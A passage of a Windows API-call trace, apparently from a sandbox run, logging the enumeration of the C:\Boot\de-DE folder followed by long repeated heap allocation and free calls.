Size=0x20) returned 0x2d27680 [0174.345] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*" (normalized: "c:\\boot\\de-de\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.346] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.346] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.346] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.346] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.348] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.397] HeapFree (in: 